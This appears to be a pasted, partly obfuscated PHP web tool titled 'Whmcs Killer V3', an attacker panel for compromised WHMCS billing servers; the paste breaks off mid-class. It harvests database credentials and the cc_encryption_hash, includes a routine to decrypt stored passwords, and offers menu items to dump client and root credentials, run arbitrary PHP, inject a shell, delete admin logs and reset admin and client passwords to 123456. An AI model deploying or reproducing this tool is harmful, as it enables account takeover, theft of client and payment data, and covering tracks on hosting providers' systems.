SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | ${"GLOBALS"}["outicdmnc"] = "ii";
| |
| 3 | ${"GLOBALS"}["utbtewtqar"] = "bg";
| |
| 4 | ${"GLOBALS"}["rgwyiylp"] = "total_pages";
| |
| 5 | ${"GLOBALS"}["yqutalc"] = "bg2";
| |
| 6 | ${"GLOBALS"}["jqnmewjo"] = "num";
| |
| 7 | ${"GLOBALS"}["kxrlsu"] = "col1";
| |
| 8 | ${"GLOBALS"}["bqfsvypmmd"] = "sql";
| |
| 9 | ${"GLOBALS"}["nhatbrs"] = "table";
| |
| 10 | ${"GLOBALS"}["ihymmcbnbwl"] = "sql1";
| |
| 11 | function login() | |
| 12 | {
| |
| 13 | echo "<center><div id='content' class='box'><br><center><h3 class=\"tit\">DB configuration of WHMCS</h3><br></center><FORM action=\"\" method=\"post\" ><input type=\"hidden\" name=\"form_action\" value=\"1\"><br><table ><tr class='bg'><td>Database Host </td><td><input type=\"text\" size=\"60\" name=\"db_host\" value=\"" . $_COOKIE["db_host"] . "\"></td></tr><tr ><td>Database Username </td><td><input type=\"text\" size=\"60\" name=\"db_username\" value=\"" . $_COOKIE["db_username"] . "\"></td></tr><tr class='bg'><td>Database Password</td><td><input type=\"text\" size=\"60\" name=\"db_password\" value=\"" . $_COOKIE["db_password"] . "\"></td></tr><tr><td>Database Name</td><td><input type=\"text\" size=\"60\" name=\"db_name\" value=\"" . $_COOKIE["db_name"] . "\"></td></tr><tr class='bg'><td>cc_encryption_hash</td><td><input type=\"text\" size=\"60\" name=\"cc_encryption_hash\" value=\"" . $_COOKIE["cc_encryption_hash"] . "\"></td></tr></table<br><INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\"></FORM><h3 class=\"tit\">Symlink to configuration.php of WHMCS</h3><br><FORM action=\"\" method=\"post\"><input type=\"hidden\" name=\"form_action\" value=\"2\"><br> <table ><tr class='bg'><td><input type=\"text\" size=\"30\" name=\"file\" value=\"\"><br> </td><td><INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\"></td></tr></table></FORM>"; | |
| 14 | if ($_COOKIE["login"] == "1") {
| |
| 15 | $key = $_COOKIE["db_name"] . "-" . base64_encode(base64_encode($_COOKIE["db_host"]) . "|" . base64_encode($_COOKIE["db_username"]) . "|" . base64_encode($_COOKIE["db_password"]) . "|" . base64_encode($_COOKIE["db_name"]) . "|" . base64_encode($_COOKIE["cc_encryption_hash"]) . "|"); | |
| 16 | echo "<p class='msg info'>Short info is <br><textarea cols=50 rows='4'>$key</textarea></p><br>"; | |
| 17 | } | |
| 18 | echo "<h3 class=\"tit\">Short info</h3><FORM action=\"\" method=\"post\"><input type=\"hidden\" name=\"form_action\" value=\"3\"><br> <table ><tr class='bg'><td><input type=\"text\" size=\"60\" name='key' ></td><td></td><td><INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\"></td></tr></table></FORM></center></div><br>"; | |
| 19 | echo "</div> <!-- /cols --><hr class=\"noscreen\" /><!-- Footer --><div id=\"footer\" class=\"box\"><p class=\"f-left\">Coded by <a href=\"http://www.rab3oun.net\">RAB3OUN</a>, </p><p class=\"f-right\">Templates by Adminizio</p></div> <!-- /footer --></div> <!-- /main --></body></html>"; | |
| 20 | } | |
| 21 | ${"GLOBALS"}["xgolbbovnt"] = "title";
| |
| 22 | ${"GLOBALS"}["tiozloyd"] = "create";
| |
| 23 | ${"GLOBALS"}["vccjfiiqqv"] = "page";
| |
| 24 | ${"GLOBALS"}["ejbqmv"] = "col";
| |
| 25 | ${"GLOBALS"}["ixziiviuycx"] = "where";
| |
| 26 | ${"GLOBALS"}["nptouqgsvo"] = "start_from";
| |
| 27 | ${"GLOBALS"}["hdpvrycfg"] = "line";
| |
| 28 | ${"GLOBALS"}["envupsjdgmq"] = "query";
| |
| 29 | ${"GLOBALS"}["kzpczwgflxjo"] = "total_records";
| |
| 30 | ${"GLOBALS"}["cmrxvpt"] = "k";
| |
| 31 | ${"GLOBALS"}["plkahzbtei"] = "x";
| |
| 32 | ${"GLOBALS"}["jshmnvixsqk"] = "value";
| |
| 33 | ${"GLOBALS"}["kwxopsllwn"] = "q";
| |
| 34 | ${"GLOBALS"}["jftdiqsydd"] = "where2";
| |
| 35 | ||
| 36 | function decrypt($string, $cc_encryption_hash) | |
| 37 | {
| |
| 38 | $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash); | |
| 39 | $hash_key = _hash($key); | |
| 40 | $hash_length = strlen($hash_key); | |
| 41 | $string = base64_decode($string); | |
| 42 | $tmp_iv = substr($string, 0, $hash_length); | |
| 43 | $string = substr($string, $hash_length, strlen($string) - $hash_length); | |
| 44 | $iv = $out = ""; | |
| 45 | $c = 0; | |
| 46 | while ($c < $hash_length) {
| |
| 47 | $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c])); | |
| 48 | ++$c; | |
| 49 | } | |
| 50 | $key = $iv; | |
| 51 | $c = 0; | |
| 52 | while ($c < strlen($string)) {
| |
| 53 | if (($c != 0 AND $c % $hash_length == 0)) {
| |
| 54 | $key = _hash($key . substr($out, $c - $hash_length, $hash_length)); | |
| 55 | } | |
| 56 | $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c])); | |
| 57 | ++$c; | |
| 58 | } | |
| 59 | return $out; | |
| 60 | } | |
| 61 | ${"GLOBALS"}["ieqlmszh"] = "db";
| |
| 62 | ${"GLOBALS"}["lrhfsm"] = "head";
| |
| 63 | ||
| 64 | function _hash($string) | |
| 65 | {
| |
| 66 | if (function_exists("sha1")) {
| |
| 67 | $hash = sha1($string); | |
| 68 | } else {
| |
| 69 | $hash = md5($string); | |
| 70 | } | |
| 71 | $out = ""; | |
| 72 | $c = 0; | |
| 73 | while ($c < strlen($hash)) {
| |
| 74 | $out .= chr(hexdec($hash[$c] . $hash[$c + 1])); | |
| 75 | $c += 2; | |
| 76 | } | |
| 77 | return $out; | |
| 78 | } | |
| 79 | ${"GLOBALS"}["tbjbrlvq"] = "item";
| |
| 80 | ${"GLOBALS"}["qhvkuofdkk"] = "columns";
| |
| 81 | function randomt() | |
| 82 | {
| |
| 83 | $chars = "abcdefghijkmnopqrstuvwxyz023456789"; | |
| 84 | srand((double) microtime() * 1000000); | |
| 85 | $i = 0; | |
| 86 | $pass = ""; | |
| 87 | while ($i <= 7) {
| |
| 88 | $num = rand() % 33; | |
| 89 | $tmp = substr($chars, $num, 1); | |
| 90 | $pass = $pass . $tmp; | |
| 91 | $i++; | |
| 92 | } | |
| 93 | return $pass; | |
| 94 | } | |
| 95 | ${"GLOBALS"}["bwjpbyzycqo"] = "r";
| |
| 96 | ${"GLOBALS"}["wmumpttm"] = "fp";
| |
| 97 | function header2() | |
| 98 | {
| |
| 99 | global $currentFile; | |
| 100 | echo "<html><title>Whmcs Killer V3 (Coded by RAB3OUN)</title><head>"; | |
| 101 | echo "<link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=1\" /> <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=5\" /> <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=4\" title=\"2col\" /><link rel=\"alternate stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=3\" title=\"1col\" /> <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=2\" /> "; | |
| 102 | echo "<style>#content {border:1px solid #afafaf; background:#fff;width:650;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /></head><body ><center><img src='?img=0'></center>";
| |
| 103 | } | |
| 104 | ${"GLOBALS"}["pcpbwvmdq"] = "v";
| |
| 105 | ${"GLOBALS"}["bftufbeb"] = "qq";
| |
| 106 | function header1() | |
| 107 | {
| |
| 108 | global $currentFile; | |
| 109 | @$query0 = mysql_query("SELECT value FROM tblconfiguration where setting='Charset' or setting='charset'");
| |
| 110 | @$v0 = mysql_fetch_array($query0); | |
| 111 | $charset = $v0["value"] ? $v0["value"] : "utf-8"; | |
| 112 | echo "<?xml version=\"1.0\"?><!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"><html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\"><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=" . $charset . "\" /><meta http-equiv=\"content-language\" content=\"en\" /><meta name=\"robots\" content=\"noindex,nofollow\" /><link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=1\" /> <!-- RESET --><link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=5\" /> <!-- MAIN STYLE SHEET --><link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=4\" title=\"2col\" /> <!-- DEFAULT: 2 COLUMNS --><link rel=\"alternate stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=3\" title=\"1col\" /> <!-- ALTERNATE: 1 COLUMN --><link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=2\" /> <!-- GRAPHIC THEME --> <title>Whmcs Killer V3 (Coded by RAB3OUN)</title></head><body><div id=\"main\"><?<!-- Tray --><div id=\"tray\" class=\"box\"><p class=\"f-left box\"> <strong>WHMCS KILLER V3 </strong></p><p class=\"f-right\"> <strong><a href=\"?p=9\" id=\"logout\">Log out</a></strong></p></div> <!-- /tray --><hr class=\"noscreen\" /><center><img src=\"?img=0\"></center><hr class=\"noscreen\" /><!-- Columns --><div id=\"cols\" class=\"box\"><!-- Aside (Left Column) --><div id=\"aside\" class=\"box\"><div class=\"padding box\"></div> <!-- /padding --><ul class=\"box\">"; | |
| 113 | $menu = array( | |
| 114 | "h" => "Home", | |
| 115 | "102" => "Info", | |
| 116 | "1" => "H0st r00ts", | |
| 117 | "2" => "Domains Resellers", | |
| 118 | "3" => "Clients r00ts", | |
| 119 | "4" => "Clients Hosting Accounts", | |
| 120 | "63" => "Clients Tickets ", | |
| 121 | "100" => "Clients List ", | |
| 122 | "105" => "Clients Password", | |
| 123 | "7" => "FTP and SMTP password", | |
| 124 | "8" => "Tools", | |
| 125 | "101" => "Eval PHP", | |
| 126 | "99\" target=\"blank\"=>\"SQL", | |
| 127 | "11" => "BackUp", | |
| 128 | "106" => "DailyEmailBackup", | |
| 129 | "108" => "1nj3c7 Sh311", | |
| 130 | "109" => "Payment Gateways", | |
| 131 | "111" => "Addon Modules", | |
| 132 | "107" => "Index", | |
| 133 | "112" => "Custom Fields" | |
| 134 | ); | |
| 135 | if ($_COOKIE["login"] <> "1") | |
| 136 | $menu = array( | |
| 137 | "c1" => "Db Config", | |
| 138 | "c2" => "Symlink to configuration.php of WHMCS", | |
| 139 | "c3" => "Short info" | |
| 140 | ); | |
| 141 | foreach ($menu as $x => $y) {
| |
| 142 | if ($_GET["p"] == $x) {
| |
| 143 | echo ("<li id='submenu-active'><a href=\"?p=$x\"> $y</a>");
| |
| 144 | } else {
| |
| 145 | echo ("<li ><a href=\"?p=$x\" > $y</a>");
| |
| 146 | } | |
| 147 | if (($x == 8)) {
| |
| 148 | echo "<ul>"; | |
| 149 | echo "<li><a href=\"?p=8&page=1\" > Upload</a></li> <li><a href=\"?p=8&page=2\" >Delete Adminlog </a></li><li><a href=\"?p=8&page=3\" >Change Admin Password to 123456</a></li><li><a href=\"?p=8&page=4\" >Change Client Password to 123456</a></li><li><a href=\"?p=8&page=5\" >Change Client Mail </a></li><li><a href=\"?p=8&page=6\" >Decrypt Password</a></li>"; | |
| 150 | echo "</ul>"; | |
| 151 | echo "</li>"; | |
| 152 | } else {
| |
| 153 | echo "</li>"; | |
| 154 | } | |
| 155 | } | |
| 156 | echo "</ul></div> <!-- /aside --><hr class=\"noscreen\" /><!-- Content (Right Column) --><div id=\"content\" class=\"box\">"; | |
| 157 | } | |
| 158 | function actionSql() | |
| 159 | {
| |
| 160 | $_POST["p2"] = stripslashes($_POST["p2"]); | |
| 161 | ${"GLOBALS"}["dsvjvi"] = "tmp";
| |
| 162 | echo "<script> var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "'; var a_ = '" . htmlspecialchars(@$_POST["a"]) . "' var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "'; var p1_ = '" . ((strpos(@$_POST["p1"], "") !== false) ? "" : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "'; var p2_ = '" . ((strpos(@$_POST["p2"], "") !== false) ? "" : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "'; var p3_ = '" . ((strpos(@$_POST["p3"], "") !== false) ? "" : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "'; var d = document;function set(a,c,p1,p2,p3,charset) {if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;}function g(a,c,p1,p2,p3,charset) {set(a,c,p1,p2,p3,charset);d.mf.submit();}function a(a,c,p1,p2,p3,charset) {set(a,c,p1,p2,p3,charset);var params = 'ajax=true';for(i=0;i<d.mf.elements.length;i++)params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);}function sr(url, params) {if (window.XMLHttpRequest)req = new XMLHttpRequest();else if (window.ActiveXObject)req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); }}function processReqChange() {if( (req.readyState == 4) )if(req.status == 200) {var reg = new RegExp(\"(\\\d+)([\\\S\\\\s]*)\", 'm');var arr=reg.exec(req.responseText);eval(arr[2].substr(0, arr[1]));} else alert('Request error!');}</script><html><title>Whmcs Killer V3 (Coded by RAB3OUN)</title><head><style>body{background: #0f0e0d;color: #FF9933;padding: 0px;}a:link, body_alink{color: #FF9933;text-decoration: none;}a:visited, body_avisited{color: #FF9933;text-decoration: none;}a:hover, a:active, body_ahover{color: #FFFFFF;text-decoration: none;}th:hover{background: #524f46;text-decoration: none;}td, th, p, li,table{background: #2e2b28;border:1px solid #524f46;}input{border: 1px solid;cursor: default;overflow: hidden;background: #2e2b28;color: #ffffff;}</style><head><body><div style='position:absolute;width:100%;top:0;left:0;'><form method=post name=mf style='display:none;'><input type=hidden name=a><input type=hidden name=c><input type=hidden name=p1><input type=hidden name=p2><input type=hidden name=p3><input type=hidden name=charset></form>";
| |
| 163 | class DbClass | |
| 164 | {
| |
| 165 | var $type; | |
| 166 | var $link; | |
| 167 | var $res; | |
| 168 | function DbClass($type) | |
| 169 | {
| |
| 170 | $this->type = $type; | |
| 171 | } | |
| 172 | function connect($host, $user, $pass, $dbname) | |
| 173 | {
| |
| 174 | switch ($this->type) {
| |
| 175 | case "mysql": | |
| 176 | if ($this->link = @mysql_connect($host, $user, $pass, true)) | |
| 177 | return true; | |
| 178 | break; | |
| 179 | case "pgsql": | |
| 180 | $host = explode(":", $host);
| |
| 181 | if (!$host[1]) | |
| 182 | $host[1] = 5432; | |
| 183 | if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname"))
| |
| 184 | return true; | |
| 185 | break; | |
| 186 | //================================ PAYMENT ================================== |
